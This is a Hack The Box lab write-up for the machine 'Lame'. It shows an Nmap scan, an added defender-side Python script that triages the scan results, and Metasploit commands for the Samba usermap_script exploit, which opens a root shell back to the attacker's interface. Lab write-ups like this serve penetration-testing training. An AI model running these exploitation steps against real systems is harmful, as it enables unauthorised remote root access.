This is my 14th write-up and I will be discussing my experience with the machine "Lame" from Hack The Box. HTB is a great platform for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. This is a retired machine and can only be accessed with a VIP subscription, which I highly recommend paying for. Lame was super easy in my opinion: exploits were widely available for the SMB version detected, landing you a root shell on the system.

Step 1: Enumeration

Kicked off an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for a second scan type. It does not hurt to run two different types of Nmap scans, because one scan may give you more results than the other depending on the flags used. The scan used default scripts (-sC) and version detection (-sV).

sinner@kali:~$ nmap -sC -sV 10.10.10.3
[sudo] password for sinner:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 22:13 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h10m24s, deviation: 2h49m45s, median: 10m22s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-19T22:23:49-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.20 seconds

I start from top to bottom when looking at my results and check for exploits on any version presented for each open port. Nmap will spoon-feed you some good information that may not even require fishing for an exploit. For example, we see that port 21 (FTP) is allowing anonymous logins without a password. That usually leads to some treasure, but in this case it was a complete rabbit hole… I moved on to the next set of ports and noticed SMB version 3.0.20, and googled it followed by the keywords "rapid 7 exploit"; this gives you the direct steps for exploiting this service. There was also a manual exploit for this using a Python script.
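Reading the scan "top to bottom" is the same thing a defender does when reviewing an external scan of their own hosts, so here is that triage as code. This is an added example, not part of the original write-up: it parses Nmap's normal output (the sample below is a constructed excerpt modelled on the scan above) into a port table plus host-script lines, then applies three checks the author read straight off the results: anonymous FTP login, an end-of-life Samba 3.0.x build, and SMB message signing disabled. The rule names and the `parse_nmap`/`triage` functions are my own.

```python
import re

# Constructed excerpt of Nmap normal output, modelled on the write-up's scan
# of 10.10.10.3. Sample input only, not a live capture.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# One row of the PORT table: "445/tcp open netbios-ssn Samba smbd 3.0.20-Debian ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Exact Samba version as -sV prints it; "3.X - 4.X" deliberately does not match.
SAMBA_RE = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)")


def parse_nmap(text):
    """Split Nmap normal output into (ports, host_scripts).

    Each port is a dict with the PORT-table columns plus the NSE script lines
    ('|' lines) Nmap printed directly beneath that port.
    """
    ports, host_scripts = [], []
    current = None            # port dict that following '|' lines belong to
    in_host_scripts = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": [],
            }
            ports.append(current)
        elif line.startswith("Host script results:"):
            in_host_scripts, current = True, None
        elif line.startswith("|"):
            entry = line.lstrip("|_ ").strip()   # drop Nmap's tree prefix
            if in_host_scripts:
                host_scripts.append(entry)
            elif current is not None:
                current["scripts"].append(entry)
        else:
            current = None    # any other line ends the current port's block
    return ports, host_scripts


def triage(ports, host_scripts):
    """Apply defender-side checks and return (port, rule_id, message) findings."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        for s in p["scripts"]:
            if s.startswith("ftp-anon:") and "Anonymous FTP login allowed" in s:
                findings.append((p["port"], "anon-ftp",
                                 "anonymous FTP login enabled; disable or restrict it"))
        m = SAMBA_RE.search(p["version"])
        # Samba 3.0.x has been end-of-life for years; the write-up shows a
        # public exploit exists for the 3.0.20 build found here.
        if m and (int(m.group(1)), int(m.group(2))) <= (3, 0):
            findings.append((p["port"], "samba-eol",
                             "Samba %s is an end-of-life branch with public exploits; upgrade"
                             % ".".join(m.groups())))
    for s in host_scripts:
        if s.startswith("message_signing:") and "disabled" in s:
            findings.append((None, "smb-signing-off",
                             "SMB message signing disabled; set 'server signing = mandatory' in smb.conf"))
    return findings


if __name__ == "__main__":
    ports, host_scripts = parse_nmap(SAMPLE_NMAP)
    for port, rule, msg in triage(ports, host_scripts):
        print("%-5s %-16s %s" % (port if port else "host", rule, msg))
```

On the sample input this reports three findings: anonymous FTP on 21, the end-of-life Samba build on 445, and signing disabled at host level. The version check is intentionally conservative: it only fires on an exact `x.y.z` string, so the "3.X - 4.X" guess on port 139 is ignored rather than reported twice.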

Step 2: Exploitation

Opened a terminal and typed the following steps to get this exploit up and running:

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0
run

Let's talk a bit about some of these commands; if you are already familiar with Metasploit, feel free to skip this section. The first command, "msfconsole", launches the Metasploit console and loads a database of exploits written in Ruby. The next line, "use exploit/multi/samba/usermap_script", specifies which exploit you want to use. If you type "show options" it will give you details on what needs to be set for the exploit in order to run it. Some basic networking skills are needed to set the next two lines, which are your target's IP and the IP (or interface) you want the target to connect back to for a shell: "set RHOSTS 10.10.10.3" and "set LHOST tun0". Once everything is set you can initiate the exploit with the "run" command.

Now we have a shell as root.

Grab your treasures from the /root directory, and since you are root anything can be obtained, so gather the user flag as well ;)

Web App Pen Tester 🦇 | https://github.com/SoftwareSinner